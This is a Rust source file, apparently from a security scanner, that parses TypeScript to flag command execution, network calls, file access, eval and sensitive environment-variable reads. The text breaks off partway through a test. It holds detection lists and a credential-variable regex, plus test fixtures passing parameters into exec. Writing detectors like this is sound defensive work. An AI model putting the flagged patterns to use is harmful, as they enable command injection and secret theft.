Skip to main content

agentshield/parser/
typescript.rs

1use std::collections::HashSet;
2use std::path::{Path, PathBuf};
3
4use once_cell::sync::Lazy;
5use regex::Regex;
6
7use super::{CallSite, FunctionDef, FunctionParam, LanguageParser, ParsedFile};
8use crate::analysis::cross_file::{sanitizer_category, sanitizer_label, SanitizerCategory};
9use crate::error::Result;
10use crate::ir::execution_surface::*;
11use crate::ir::{ArgumentSource, Language, SourceLocation};
12
/// Stateless [`LanguageParser`] implementation for TypeScript sources.
///
/// With the `typescript` feature enabled the file is parsed through tree-sitter
/// (using the TSX grammar for `.tsx`/`.jsx` paths); without it, a regex-based
/// line scanner is used instead.
pub struct TypeScriptParser;
14
15// ── Dangerous patterns ───────────────────────────────────────────
16
17static EXEC_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
18    vec![
19        "exec",
20        "execSync",
21        "execFile",
22        "execFileSync",
23        "spawn",
24        "spawnSync",
25        "child_process.exec",
26        "child_process.execSync",
27        "child_process.execFile",
28        "child_process.execFileSync",
29        "child_process.spawn",
30        "child_process.spawnSync",
31        "cp.exec",
32        "cp.execSync",
33        "cp.spawn",
34        "cp.spawnSync",
35        "shelljs.exec",
36        "execa",
37        "execaSync",
38    ]
39});
40
41static NETWORK_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
42    vec![
43        "fetch",
44        "http.get",
45        "http.request",
46        "https.get",
47        "https.request",
48        "axios",
49        "axios.get",
50        "axios.post",
51        "axios.put",
52        "axios.patch",
53        "axios.delete",
54        "axios.request",
55        "got",
56        "got.get",
57        "got.post",
58        "got.put",
59        "got.patch",
60        "got.delete",
61        "request",
62        "request.get",
63        "request.post",
64        "superagent.get",
65        "superagent.post",
66        "undici.fetch",
67        "undici.request",
68    ]
69});
70
71static FILE_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
72    vec![
73        "readFile",
74        "readFileSync",
75        "writeFile",
76        "writeFileSync",
77        "appendFile",
78        "appendFileSync",
79        "unlink",
80        "unlinkSync",
81        "readdir",
82        "readdirSync",
83        "fs.readFile",
84        "fs.readFileSync",
85        "fs.writeFile",
86        "fs.writeFileSync",
87        "fs.appendFile",
88        "fs.appendFileSync",
89        "fs.unlink",
90        "fs.unlinkSync",
91        "fs.readdir",
92        "fs.readdirSync",
93        "fs.promises.readFile",
94        "fs.promises.writeFile",
95        "fs.promises.unlink",
96        "fs.promises.readdir",
97        "Deno.readTextFile",
98        "Deno.writeTextFile",
99        "Deno.readFile",
100        "Deno.writeFile",
101        "Bun.file",
102    ]
103});
104
105static DYNAMIC_EXEC_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
106    vec![
107        "eval",
108        "Function",
109        "vm.runInThisContext",
110        "vm.runInNewContext",
111    ]
112});
113
114static SENSITIVE_ENV_VARS: Lazy<Regex> = Lazy::new(|| {
115    Regex::new(r"(?i)(AWS_|SECRET|TOKEN|PASSWORD|API_KEY|PRIVATE_KEY|CREDENTIALS|AUTH)").unwrap()
116});
117
118// Template literal with interpolation: `...${expr}...`
119static TEMPLATE_LITERAL_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r"\$\{[^}]+\}").unwrap());
120
121// Sanitizer assignment: const validPath = await validatePath(x)
122// Captures: (1) variable name, (2) function name (possibly dotted)
123static SANITIZER_ASSIGN_RE: Lazy<Regex> = Lazy::new(|| {
124    Regex::new(r"(?:const|let|var)\s+(\w+)\s*=\s*(?:await\s+)?(\w+(?:\.\w+)*)\s*\(").unwrap()
125});
126
127// ── tree-sitter AST parser ──────────────────────────────────────
128
#[cfg(feature = "typescript")]
impl LanguageParser for TypeScriptParser {
    /// Reports the language this parser handles.
    fn language(&self) -> Language {
        Language::TypeScript
    }

    /// Parses `content` with tree-sitter and collects the findings into a
    /// [`ParsedFile`].
    ///
    /// `path` selects the grammar (TSX for `.tsx`/`.jsx`, TypeScript otherwise)
    /// and is used for error messages and source locations.
    ///
    /// # Errors
    ///
    /// Returns `ShieldError::Parse` when the grammar cannot be loaded or when
    /// tree-sitter produces no tree.
    fn parse_file(&self, path: &Path, content: &str) -> Result<ParsedFile> {
        // Both failure modes produce the same error variant for the same file.
        let parse_error = |message: String| crate::error::ShieldError::Parse {
            file: path.display().to_string(),
            message,
        };

        let grammar = match path.extension() {
            Some(ext) if ext == "tsx" || ext == "jsx" => tree_sitter_typescript::LANGUAGE_TSX,
            _ => tree_sitter_typescript::LANGUAGE_TYPESCRIPT,
        };

        let mut ts_parser = tree_sitter::Parser::new();
        ts_parser
            .set_language(&grammar.into())
            .map_err(|e| parse_error(format!("Failed to load TypeScript grammar: {e}")))?;

        let tree = ts_parser
            .parse(content, None)
            .ok_or_else(|| parse_error("tree-sitter failed to parse TypeScript".into()))?;

        let root = tree.root_node();
        let bytes = content.as_bytes();
        let file_path = path.to_path_buf();
        let mut parsed = ParsedFile::default();
        let mut param_names = HashSet::new();

        // Phase 0: sanitizer assignments are found by regex on the raw text and
        // must be known before arguments are classified in phase 2.
        detect_sanitizer_assignments(content, &mut parsed.sanitized_vars);

        // Phase 1: function definitions and their parameter names.
        collect_params(root, bytes, &file_path, &mut param_names, &mut parsed);

        // Phase 2: call expressions, call sites, and env accesses.
        walk_node(root, bytes, &file_path, &param_names, &mut parsed);

        Ok(parsed)
    }
}
190
/// Walks the subtree rooted at `node` and records every function-like node.
///
/// For each function declaration, function expression, arrow function, or
/// method definition, every parameter name except `this` is added to
/// `param_names` and pushed onto `parsed.function_params`. When the function
/// has a resolvable name, a `FunctionDef` is pushed onto `parsed.function_defs`.
#[cfg(feature = "typescript")]
fn collect_params(
    node: tree_sitter::Node,
    source: &[u8],
    file_path: &Path,
    param_names: &mut HashSet<String>,
    parsed: &mut ParsedFile,
) {
    let is_function_like = matches!(
        node.kind(),
        "function_declaration"
            | "function"
            | "arrow_function"
            | "method_definition"
            | "function_expression"
    );

    if is_function_like {
        // Anonymous functions are tracked under an empty name.
        let func_name = extract_function_name(node, source).unwrap_or_default();
        let mut declared = Vec::new();

        if let Some(formal) = node.child_by_field_name("parameters") {
            let entries = (0..formal.named_child_count()).filter_map(|idx| formal.named_child(idx));
            for entry in entries {
                let names = extract_param_names(entry, source)
                    .into_iter()
                    .filter(|name| name != "this");
                for name in names {
                    param_names.insert(name.clone());
                    declared.push(name.clone());
                    parsed.function_params.push(FunctionParam {
                        function_name: func_name.clone(),
                        param_name: name,
                        location: loc(file_path, entry),
                    });
                }
            }
        }

        // Only named functions get a FunctionDef entry.
        if !func_name.is_empty() {
            let is_exported = is_exported_node(node, source);
            parsed.function_defs.push(FunctionDef {
                name: func_name,
                params: declared,
                is_exported,
                location: loc(file_path, node),
            });
        }
    }

    // Descend into every named child, including the bodies of functions.
    let children = (0..node.named_child_count()).filter_map(|idx| node.named_child(idx));
    for child in children {
        collect_params(child, source, file_path, param_names, parsed);
    }
}
249
/// Reports whether a function node should be treated as exported.
///
/// Returns `true` when an `export_statement` is found among the ancestors
/// (the search stops at the first `program` or `statement_block`), or when the
/// source text of the immediate parent contains `module.exports` or `exports.`.
#[cfg(feature = "typescript")]
fn is_exported_node(node: tree_sitter::Node, source: &[u8]) -> bool {
    // ES module form: look for an enclosing `export ...` statement.
    let mut ancestor = node.parent();
    while let Some(current) = ancestor {
        match current.kind() {
            "export_statement" => return true,
            // Reached a block / file boundary without seeing an export.
            "program" | "statement_block" => break,
            _ => ancestor = current.parent(),
        }
    }

    // CommonJS form, e.g. `module.exports.func = function(...) {}`.
    // NOTE(review): the parent's text spans its entire subtree (the whole file
    // when the parent is `program`), so this also matches when `exports.`
    // merely appears somewhere inside it — confirm this breadth is intended.
    node.parent().is_some_and(|parent| {
        let text = node_text(parent, source);
        text.contains("module.exports") || text.contains("exports.")
    })
}
276
/// Resolves the name of a function-like node, if it has one.
///
/// The node's own `name` field wins. Otherwise, for an arrow function or
/// function expression whose parent is a `variable_declarator`
/// (`const handler = async (params) => { ... }`), the declared variable name
/// is used. Returns `None` in every other case.
#[cfg(feature = "typescript")]
fn extract_function_name(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
    if let Some(own_name) = node.child_by_field_name("name") {
        return Some(node_text(own_name, source).to_string());
    }

    if !matches!(node.kind(), "arrow_function" | "function_expression") {
        return None;
    }

    let declarator = node
        .parent()
        .filter(|parent| parent.kind() == "variable_declarator")?;
    declarator
        .child_by_field_name("name")
        .map(|binding| node_text(binding, source).to_string())
}
299
/// Returns the binding name(s) introduced by one child of a parameter list.
///
/// A `Vec` is returned because destructuring patterns introduce several names.
/// Node kinds that are not handled yield an empty `Vec`.
#[cfg(feature = "typescript")]
fn extract_param_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
    match node.kind() {
        // Typed parameters carry the binding in their `pattern` field.
        "required_parameter" | "optional_parameter" => {
            let Some(pattern) = node.child_by_field_name("pattern") else {
                return Vec::new();
            };
            match pattern.kind() {
                "identifier" => vec![node_text(pattern, source).to_string()],
                // `{ url, name }` => ["url", "name"]
                "object_pattern" => extract_object_pattern_names(pattern, source),
                // `[a, b]` => ["a", "b"]
                "array_pattern" => extract_array_pattern_names(pattern, source),
                _ => Vec::new(),
            }
        }
        // `...args`: the first identifier child is the binding.
        "rest_pattern" => (0..node.named_child_count())
            .filter_map(|idx| node.named_child(idx))
            .find(|child| child.kind() == "identifier")
            .map(|child| vec![node_text(child, source).to_string()])
            .unwrap_or_default(),
        // Bare identifier (parameter without a type annotation wrapper).
        "identifier" => vec![node_text(node, source).to_string()],
        _ => Vec::new(),
    }
}
338
/// Collects the local binding names from an object destructuring pattern.
///
/// `{ url }` contributes `url`; `{ url: myUrl }` contributes `myUrl` (only when
/// the value side is a plain identifier). Other entries are ignored.
#[cfg(feature = "typescript")]
fn extract_object_pattern_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
    (0..node.named_child_count())
        .filter_map(|idx| node.named_child(idx))
        .filter_map(|entry| match entry.kind() {
            "shorthand_property_identifier_pattern" => Some(node_text(entry, source).to_string()),
            "pair_pattern" => entry
                .child_by_field_name("value")
                .filter(|value| value.kind() == "identifier")
                .map(|value| node_text(value, source).to_string()),
            _ => None,
        })
        .collect()
}
364
/// Collects the identifier elements of an array destructuring pattern,
/// e.g. `[a, b]` => `["a", "b"]`. Non-identifier elements are skipped.
#[cfg(feature = "typescript")]
fn extract_array_pattern_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
    (0..node.named_child_count())
        .filter_map(|idx| node.named_child(idx))
        .filter(|element| element.kind() == "identifier")
        .map(|element| node_text(element, source).to_string())
        .collect()
}
378
/// Walks the subtree rooted at `node`, recording env accesses and call findings.
///
/// * `member_expression` / `subscript_expression` nodes whose text starts with
///   `process.env` are pushed onto `parsed.env_accesses` when a variable name
///   can be extracted.
/// * Every `call_expression` is pushed onto `parsed.call_sites`, and is also
///   recorded as a command, network operation, dynamic execution, or file
///   operation when the callee name matches the corresponding pattern list.
///
/// The HTTP method, the `sends_data` flag, and the file operation type are
/// derived from the *final segment* of the callee (`axios.post` -> `post`).
/// Looking at the whole callee text would misclassify calls such as
/// `getClient().post(...)` (contains "get") or `computeApi.get(...)`
/// (contains "put").
#[cfg(feature = "typescript")]
fn walk_node(
    node: tree_sitter::Node,
    source: &[u8],
    file_path: &Path,
    param_names: &HashSet<String>,
    parsed: &mut ParsedFile,
) {
    let kind = node.kind();

    // process.env.VAR or process.env["VAR"]
    if (kind == "member_expression" || kind == "subscript_expression")
        && node_text(node, source).starts_with("process.env")
    {
        if let Some(name) = extract_env_var_name(node, source) {
            let is_sensitive = SENSITIVE_ENV_VARS.is_match(&name);
            parsed.env_accesses.push(EnvAccess {
                var_name: ArgumentSource::Literal(name),
                is_sensitive,
                location: loc(file_path, node),
            });
        }
    }

    if kind == "call_expression" {
        if let Some(func_node) = node.child_by_field_name("function") {
            let func_name = resolve_call_name(func_node, source);
            // Last dotted segment of the callee, e.g. "post" for "axios.post".
            let method_name = func_name
                .rsplit('.')
                .next()
                .unwrap_or(func_name.as_str());

            // Classify all arguments (not just the first) for CallSite recording.
            let args_node = node.child_by_field_name("arguments");
            let all_arg_sources =
                classify_all_arguments(args_node, source, param_names, &parsed.sanitized_vars);

            // The per-category detectors below only look at the first argument.
            let arg_source = all_arg_sources
                .first()
                .cloned()
                .unwrap_or(ArgumentSource::Unknown);

            // Record CallSite for cross-file analysis.
            let caller_name = find_enclosing_function(node, source);
            parsed.call_sites.push(CallSite {
                callee: func_name.clone(),
                arguments: all_arg_sources,
                caller: caller_name,
                location: loc(file_path, node),
            });

            // Command execution
            if matches_pattern(&func_name, &EXEC_PATTERNS) {
                parsed.commands.push(CommandInvocation {
                    function: func_name.clone(),
                    command_arg: arg_source.clone(),
                    location: loc(file_path, node),
                });
            }

            // Network operations
            if matches_pattern(&func_name, &NETWORK_PATTERNS) {
                let full_args_text = args_node
                    .map(|args| node_text(args, source))
                    .unwrap_or_default();
                // A body-carrying verb, or an options object with a payload key.
                let sends_data = matches!(method_name, "post" | "put" | "patch")
                    || full_args_text.contains("body:")
                    || full_args_text.contains("data:");
                let method = match method_name {
                    "get" => Some("GET".into()),
                    "post" => Some("POST".into()),
                    "put" => Some("PUT".into()),
                    "patch" => Some("PATCH".into()),
                    "delete" => Some("DELETE".into()),
                    _ => None,
                };
                parsed.network_operations.push(NetworkOperation {
                    function: func_name.clone(),
                    url_arg: arg_source.clone(),
                    method,
                    sends_data,
                    location: loc(file_path, node),
                });
            }

            // Dynamic execution (exact name match, not suffix match)
            if DYNAMIC_EXEC_PATTERNS.contains(&func_name.as_str()) {
                parsed.dynamic_exec.push(DynamicExec {
                    function: func_name.clone(),
                    code_arg: arg_source.clone(),
                    location: loc(file_path, node),
                });
            }

            // File operations
            if matches_pattern(&func_name, &FILE_PATTERNS) {
                let op_type = if method_name.contains("write") || method_name.contains("append") {
                    FileOpType::Write
                } else if method_name.contains("unlink") {
                    FileOpType::Delete
                } else if method_name.contains("readdir") {
                    FileOpType::List
                } else {
                    FileOpType::Read
                };
                parsed.file_operations.push(FileOperation {
                    operation: op_type,
                    path_arg: arg_source.clone(),
                    location: loc(file_path, node),
                });
            }
        }
    }

    // Recurse into every named child; nested calls and accesses inside an
    // already-recorded node are visited too.
    for i in 0..node.named_child_count() {
        if let Some(child) = node.named_child(i) {
            walk_node(child, source, file_path, param_names, parsed);
        }
    }
}
505
/// Classifies each named child of a call's argument list, in order.
///
/// Returns an empty `Vec` when the call has no `arguments` node.
#[cfg(feature = "typescript")]
fn classify_all_arguments(
    args_node: Option<tree_sitter::Node>,
    source: &[u8],
    param_names: &HashSet<String>,
    sanitized_vars: &HashSet<String>,
) -> Vec<ArgumentSource> {
    let Some(args) = args_node else {
        return Vec::new();
    };

    (0..args.named_child_count())
        .filter_map(|idx| args.named_child(idx))
        .map(|arg| {
            classify_argument_with_sanitizers(node_text(arg, source), param_names, sanitized_vars)
        })
        .collect()
}
530
/// Returns the name of the nearest function-like ancestor of `node`
/// (used as the caller of a call site).
///
/// The search stops at the first function-like ancestor, so the result is
/// `None` both when there is no enclosing function and when the nearest one
/// has no resolvable name.
// NOTE(review): a call inside an anonymous callback therefore reports no
// caller even if a named function encloses the callback — confirm intended.
#[cfg(feature = "typescript")]
fn find_enclosing_function(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
    let mut ancestor = node.parent();
    while let Some(scope) = ancestor {
        let is_function_like = matches!(
            scope.kind(),
            "function_declaration"
                | "function"
                | "arrow_function"
                | "method_definition"
                | "function_expression"
        );
        if is_function_like {
            return extract_function_name(scope, source);
        }
        ancestor = scope.parent();
    }
    None
}
549
/// Produces the textual callee name for a call expression's `function` node.
///
/// Member chains and optional chains have spaces and newlines removed so a
/// chain split across lines becomes `a.b.c`; any other node kind is returned
/// as its verbatim source text.
#[cfg(feature = "typescript")]
fn resolve_call_name(node: tree_sitter::Node, source: &[u8]) -> String {
    let raw = node_text(node, source);
    if matches!(node.kind(), "member_expression" | "optional_chain_expression") {
        raw.chars().filter(|ch| !matches!(ch, '\n' | ' ')).collect()
    } else {
        raw.to_string()
    }
}
563
/// Extracts the variable name from a direct `process.env` access.
///
/// Handles `process.env.VAR` (and `process.env?.VAR`) via the member
/// expression's `property` field, and `process.env["VAR"]` /
/// `process.env['VAR']` via the subscript's `index` field with surrounding
/// quotes trimmed. A non-string index such as `process.env[key]` yields the
/// index expression text.
///
/// Returns `None` unless the accessed object is exactly `process.env`. This
/// keeps outer expressions such as `process.env.FOO.length` or
/// `process.env.FOO[0]` from being reported under bogus names like
/// `FOO.length`; the inner `process.env.FOO` node is visited separately.
#[cfg(feature = "typescript")]
fn extract_env_var_name(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
    let object = node.child_by_field_name("object")?;
    if node_text(object, source) != "process.env" {
        return None;
    }

    let name = match node.kind() {
        "member_expression" => node_text(node.child_by_field_name("property")?, source),
        "subscript_expression" => node_text(node.child_by_field_name("index")?, source)
            .trim_matches('"')
            .trim_matches('\''),
        _ => return None,
    };

    (!name.is_empty()).then(|| name.to_string())
}
584
/// Returns the source text covered by `node`, or `""` when that byte range
/// is not valid UTF-8.
#[cfg(feature = "typescript")]
fn node_text<'a>(node: tree_sitter::Node, source: &'a [u8]) -> &'a str {
    match node.utf8_text(source) {
        Ok(text) => text,
        Err(_) => "",
    }
}
590
/// Converts a tree-sitter node's span into a `SourceLocation`.
///
/// Rows are shifted by one so lines are 1-indexed; columns are passed through
/// exactly as tree-sitter reports them.
#[cfg(feature = "typescript")]
fn loc(file: &Path, node: tree_sitter::Node) -> SourceLocation {
    let (first, last) = (node.start_position(), node.end_position());
    SourceLocation {
        file: PathBuf::from(file),
        line: first.row + 1,
        column: first.column,
        end_line: Some(last.row + 1),
        end_column: Some(last.column),
    }
}
604
605// ── Shared sanitizer detection ──────────────────────────────────
606
607/// Detect sanitizer assignments in source code and populate sanitized_vars.
608/// Matches patterns like: `const validPath = await validatePath(x)`
609fn detect_sanitizer_assignments(content: &str, sanitized_vars: &mut HashSet<String>) {
610    for cap in SANITIZER_ASSIGN_RE.captures_iter(content) {
611        let var_name = &cap[1];
612        let func_name = &cap[2];
613        if sanitizer_category(func_name)
614            .is_some_and(|category| !matches!(category, SanitizerCategory::Redaction))
615        {
616            sanitized_vars.insert(var_name.to_string());
617            if let Some(label) = sanitizer_label(func_name) {
618                sanitized_vars.insert(sanitized_var_marker(var_name, &label));
619            }
620        }
621    }
622}
623
/// Builds the `var::label` marker string stored alongside a sanitized
/// variable's plain name.
fn sanitized_var_marker(var_name: &str, sanitizer_label: &str) -> String {
    let mut marker = String::with_capacity(var_name.len() + 2 + sanitizer_label.len());
    marker.push_str(var_name);
    marker.push_str("::");
    marker.push_str(sanitizer_label);
    marker
}
627
628fn sanitized_label_for_var(ident: &str, sanitized_vars: &HashSet<String>) -> Option<String> {
629    for category in [
630        SanitizerCategory::Path,
631        SanitizerCategory::Network,
632        SanitizerCategory::TypeCoercion,
633    ] {
634        let prefix = format!("{}:", category.as_str());
635        if let Some(marker) = sanitized_vars
636            .iter()
637            .find(|value| value.starts_with(&format!("{ident}::{prefix}")))
638        {
639            return marker.split_once("::").map(|(_, label)| label.to_string());
640        }
641    }
642
643    sanitized_vars.contains(ident).then(|| ident.to_string())
644}
645
646/// Classify an argument, considering sanitized variables.
647fn classify_argument_with_sanitizers(
648    arg_text: &str,
649    param_names: &HashSet<String>,
650    sanitized_vars: &HashSet<String>,
651) -> ArgumentSource {
652    let first_arg = arg_text.split(',').next().unwrap_or("").trim();
653
654    if first_arg.is_empty() {
655        return ArgumentSource::Unknown;
656    }
657
658    // Check if this is a sanitized variable (before other checks)
659    let ident = first_arg.split('.').next().unwrap_or(first_arg);
660    let ident = ident.split('[').next().unwrap_or(ident);
661    if let Some(sanitizer) = sanitized_label_for_var(ident, sanitized_vars) {
662        return ArgumentSource::Sanitized { sanitizer };
663    }
664
665    // Delegate to existing classification
666    classify_argument_text(first_arg, param_names)
667}
668
669// ── Regex fallback parser (when typescript feature is disabled) ──
670
671#[cfg(not(feature = "typescript"))]
672static CALL_RE: Lazy<Regex> =
673    Lazy::new(|| Regex::new(r"(?m)(\w+(?:\.\w+)*)\s*\(([^)]*)\)").unwrap());
674
675#[cfg(not(feature = "typescript"))]
676static ENV_ACCESS_RE: Lazy<Regex> = Lazy::new(|| {
677    Regex::new(r#"(?m)process\.env\s*(?:\[\s*["']([^"']+)["']\s*\]|\.([A-Z_][A-Z0-9_]*))"#).unwrap()
678});
679
680#[cfg(not(feature = "typescript"))]
681static FUNC_DEF_RE: Lazy<Regex> = Lazy::new(|| {
682    Regex::new(
683        r"(?m)(?:(?:export\s+)?(?:async\s+)?function\s+(\w+)\s*\(([^)]*)\)|(?:const|let|var)\s+(\w+)\s*=\s*(?:async\s+)?\(([^)]*)\)\s*(?:=>|:\s*\w+\s*=>)|(\w+)\s*\(([^)]*)\)\s*(?::\s*\w+\s*)?\{)"
684    ).unwrap()
685});
686
687#[cfg(not(feature = "typescript"))]
688impl LanguageParser for TypeScriptParser {
689    fn language(&self) -> Language {
690        Language::TypeScript
691    }
692
693    fn parse_file(&self, path: &Path, content: &str) -> Result<ParsedFile> {
694        let mut parsed = ParsedFile::default();
695        let file_path = PathBuf::from(path);
696        let mut param_names = HashSet::new();
697
698        // Phase 0: Detect sanitizer assignments
699        detect_sanitizer_assignments(content, &mut parsed.sanitized_vars);
700
701        // Collect function parameter names + FunctionDef entries
702        for cap in FUNC_DEF_RE.captures_iter(content) {
703            let params_str = cap
704                .get(2)
705                .or_else(|| cap.get(4))
706                .or_else(|| cap.get(6))
707                .map(|m| m.as_str())
708                .unwrap_or("");
709            let func_name = cap
710                .get(1)
711                .or_else(|| cap.get(3))
712                .or_else(|| cap.get(5))
713                .map(|m| m.as_str())
714                .unwrap_or("");
715
716            let full_match = cap.get(0).map(|m| m.as_str()).unwrap_or("");
717            let is_exported = full_match.starts_with("export");
718
719            let mut func_params = Vec::new();
720            for param in params_str.split(',') {
721                let param = param.trim();
722                if param.starts_with('{') || param.starts_with('[') {
723                    continue;
724                }
725                let param = param.split(':').next().unwrap_or("").trim();
726                let param = param.split('=').next().unwrap_or("").trim();
727                let param = param.trim_start_matches("...");
728                let param = param.trim_end_matches('?');
729                if !param.is_empty() && param != "this" {
730                    param_names.insert(param.to_string());
731                    func_params.push(param.to_string());
732                    parsed.function_params.push(FunctionParam {
733                        function_name: func_name.to_string(),
734                        param_name: param.to_string(),
735                        location: regex_loc(&file_path, 0),
736                    });
737                }
738            }
739
740            if !func_name.is_empty() {
741                parsed.function_defs.push(FunctionDef {
742                    name: func_name.to_string(),
743                    params: func_params,
744                    is_exported,
745                    location: regex_loc(&file_path, 0),
746                });
747            }
748        }
749
750        // Scan line by line
751        for (line_idx, line) in content.lines().enumerate() {
752            let line_num = line_idx + 1;
753            let trimmed = line.trim();
754
755            if trimmed.starts_with("//") || trimmed.starts_with('*') || trimmed.starts_with("/*") {
756                continue;
757            }
758
759            for cap in ENV_ACCESS_RE.captures_iter(line) {
760                let var_name = cap
761                    .get(1)
762                    .or_else(|| cap.get(2))
763                    .map(|m| m.as_str().to_string())
764                    .unwrap_or_default();
765                let is_sensitive = SENSITIVE_ENV_VARS.is_match(&var_name);
766                parsed.env_accesses.push(EnvAccess {
767                    var_name: ArgumentSource::Literal(var_name),
768                    is_sensitive,
769                    location: regex_loc(&file_path, line_num),
770                });
771            }
772
773            for cap in CALL_RE.captures_iter(line) {
774                let func_name = &cap[1];
775                let args_str = &cap[2];
776                let arg_source = classify_argument_with_sanitizers(
777                    args_str,
778                    &param_names,
779                    &parsed.sanitized_vars,
780                );
781
782                // Record CallSite
783                let all_args = args_str
784                    .split(',')
785                    .map(|a| {
786                        classify_argument_with_sanitizers(
787                            a.trim(),
788                            &param_names,
789                            &parsed.sanitized_vars,
790                        )
791                    })
792                    .collect::<Vec<_>>();
793                parsed.call_sites.push(CallSite {
794                    callee: func_name.to_string(),
795                    arguments: all_args,
796                    caller: None, // Regex path can't easily determine enclosing function
797                    location: regex_loc(&file_path, line_num),
798                });
799
800                if matches_pattern(func_name, &EXEC_PATTERNS) {
801                    parsed.commands.push(CommandInvocation {
802                        function: func_name.to_string(),
803                        command_arg: arg_source.clone(),
804                        location: regex_loc(&file_path, line_num),
805                    });
806                }
807
808                if matches_pattern(func_name, &NETWORK_PATTERNS) {
809                    let sends_data = func_name.contains("post")
810                        || func_name.contains("put")
811                        || func_name.contains("patch")
812                        || args_str.contains("body:")
813                        || args_str.contains("data:");
814                    let method = if func_name.contains("get") {
815                        Some("GET".into())
816                    } else if func_name.contains("post") {
817                        Some("POST".into())
818                    } else if func_name.contains("put") {
819                        Some("PUT".into())
820                    } else {
821                        None
822                    };
823                    parsed.network_operations.push(NetworkOperation {
824                        function: func_name.to_string(),
825                        url_arg: arg_source.clone(),
826                        method,
827                        sends_data,
828                        location: regex_loc(&file_path, line_num),
829                    });
830                }
831
832                if DYNAMIC_EXEC_PATTERNS.contains(&func_name) {
833                    parsed.dynamic_exec.push(DynamicExec {
834                        function: func_name.to_string(),
835                        code_arg: arg_source.clone(),
836                        location: regex_loc(&file_path, line_num),
837                    });
838                }
839
840                if matches_pattern(func_name, &FILE_PATTERNS) {
841                    let op_type = if func_name.contains("write") || func_name.contains("append") {
842                        FileOpType::Write
843                    } else if func_name.contains("unlink") {
844                        FileOpType::Delete
845                    } else if func_name.contains("readdir") {
846                        FileOpType::List
847                    } else {
848                        FileOpType::Read
849                    };
850                    parsed.file_operations.push(FileOperation {
851                        operation: op_type,
852                        path_arg: arg_source.clone(),
853                        location: regex_loc(&file_path, line_num),
854                    });
855                }
856            }
857        }
858
859        Ok(parsed)
860    }
861}
862
863#[cfg(not(feature = "typescript"))]
864fn regex_loc(file: &Path, line: usize) -> SourceLocation {
865    SourceLocation {
866        file: file.to_path_buf(),
867        line,
868        column: 0,
869        end_line: None,
870        end_column: None,
871    }
872}
873
874// ── Shared helpers ──────────────────────────────────────────────
875
/// Report whether `func_name` equals one of `patterns` or ends with one.
///
/// The comparison is a plain, case-sensitive suffix test, so a qualified
/// callee such as `cp.exec` matches the pattern `exec`.
fn matches_pattern(func_name: &str, patterns: &[&str]) -> bool {
    for &candidate in patterns {
        if func_name.ends_with(candidate) || func_name == candidate {
            return true;
        }
    }
    false
}
882
883/// Classify an argument text to determine its source.
884fn classify_argument_text(arg_text: &str, param_names: &HashSet<String>) -> ArgumentSource {
885    let first_arg = arg_text.split(',').next().unwrap_or("").trim();
886
887    if first_arg.is_empty() {
888        return ArgumentSource::Unknown;
889    }
890
891    // String literal (double or single quoted)
892    if (first_arg.starts_with('"') && first_arg.ends_with('"'))
893        || (first_arg.starts_with('\'') && first_arg.ends_with('\''))
894    {
895        if first_arg.len() >= 2 {
896            let val = &first_arg[1..first_arg.len() - 1];
897            return ArgumentSource::Literal(val.to_string());
898        }
899        return ArgumentSource::Literal(String::new());
900    }
901
902    // Template literal with interpolation: `...${var}...`
903    if first_arg.starts_with('`') {
904        if TEMPLATE_LITERAL_RE.is_match(first_arg) {
905            return ArgumentSource::Interpolated;
906        }
907        let val = first_arg.trim_matches('`');
908        return ArgumentSource::Literal(val.to_string());
909    }
910
911    // String concatenation with +
912    if first_arg.contains('+') && (first_arg.contains('"') || first_arg.contains('\'')) {
913        return ArgumentSource::Interpolated;
914    }
915
916    // process.env reference
917    if first_arg.contains("process.env") {
918        return ArgumentSource::EnvVar {
919            name: first_arg.to_string(),
920        };
921    }
922
923    // Known function parameter
924    let ident = first_arg.split('.').next().unwrap_or(first_arg);
925    let ident = ident.split('[').next().unwrap_or(ident);
926    if param_names.contains(ident) {
927        return ArgumentSource::Parameter {
928            name: ident.to_string(),
929        };
930    }
931
932    ArgumentSource::Unknown
933}
934
// Unit tests for `TypeScriptParser::parse_file`. Each test feeds a small
// TypeScript fixture to the parser and asserts on the resulting `ParsedFile`.
#[cfg(test)]
mod tests {
    use super::*;

    /// `exec(command)` with a function parameter yields one command whose
    /// argument is classified as `Parameter`.
    #[test]
    fn detects_exec_with_param() {
        let code = r#"
import { exec } from "child_process";

function runCommand(command: string) {
    exec(command);
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.commands.len(), 1);
        assert!(matches!(
            parsed.commands[0].command_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// A template literal containing `${cmd}` is classified as `Interpolated`.
    /// Note: despite the test name, the fixture calls `exec`, not `spawn`.
    #[test]
    fn detects_spawn_with_interpolation() {
        let code = r#"
function run(cmd: string) {
    exec(`${cmd} --flag`);
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.commands.len(), 1);
        assert!(matches!(
            parsed.commands[0].command_arg,
            ArgumentSource::Interpolated
        ));
    }

    /// `fetch(url)` with a function parameter yields one network operation
    /// whose URL is classified as `Parameter`.
    #[test]
    fn detects_fetch_with_param() {
        let code = r#"
async function fetchUrl(url: string) {
    const resp = await fetch(url);
    return resp.json();
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(matches!(
            parsed.network_operations[0].url_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// A `fetch` with a string-literal URL is still recorded as a network
    /// operation, but its URL is classified as `Literal`.
    #[test]
    fn safe_literal_url_not_flagged() {
        let code = r#"
async function getHealth() {
    const resp = await fetch("https://api.example.com/health");
    return resp.json();
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(matches!(
